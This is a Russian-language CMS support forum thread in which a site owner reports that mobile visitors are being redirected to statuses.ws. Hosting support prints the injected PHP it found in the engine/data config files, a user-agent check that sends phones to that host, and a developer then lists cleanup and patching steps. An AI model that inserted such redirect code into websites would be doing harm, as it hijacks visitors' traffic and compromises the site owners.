Перейти к публикации

Рекомендованные сообщения

Привет, короче последние пару недель когда я захожу на свои сайты с телефона, открывается statuses.ws и livecounter.ws, спросил в тех поддержке на сервере и там обнаружиле эти когда, подскажите что происходит и что надо делать, спасибо


Уважаемый Pavel!

Есть строки вида -

engine/data/config.php:274: header('Location: http://statuses.ws/');

engine/data/config.php:283: header('Location: http://statuses.ws/');

engine/data/dbconfig.php:26: header('Location: http://statuses.ws/');

engine/data/dbconfig.php:35: header('Location: http://statuses.ws/');

Владелц у этих файлов www-data, дата изменения Янв 12 19:25.

Запустить сканирование сервера антивирусом?

C уважением, специалист службы поддержки FastVPS LLC

Мамонов Сергей


Дорогой Pavel!

Как вижу дописан сторонний код вида -

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {

header('Location: http://statuses.ws/');

}

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {

header('Location: http://statuses.ws/');

}


C уважением, специалист службы поддержки FastVPS LLC

Мамонов Сергей

Сайт http://www.bestpcreviews.com

упс, поздно заметил что проблема такая была у других, т.е. если я обновлю движок до последнее версии (естественно он идёт с обновленным патчем теперь) то всё должно работать?

А откуда надо будет убрать потом эти кода?

Ссылка на сообщение
Поделиться на других сайтах

pahanorlando,

происходит по причине отсутствия патчей безопасности http://dle-news.ru/bags/

Что делать:

1. Восстановите все файлы на сервере на оригинальные из архива дистрибутива.

2. Установите все патчи безопасности повторно после этого http://dle-news.ru/bags/

3. В админпанели запустите антивирус и удалите все на что он укажет.

4. Проверьте файлы в папке engine/data/ на наличие посторонних кодов.

5. Удалите все посторонние модули и скрипты с сервера если таковые имеются

6. Смените все пароли в том числе к БД и по FTP.

Если после этого вирус не пропадет, пишите нам, предоставляйте доступ по FTP и к админпанели скрипта, будем осматривать ваш сервер.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...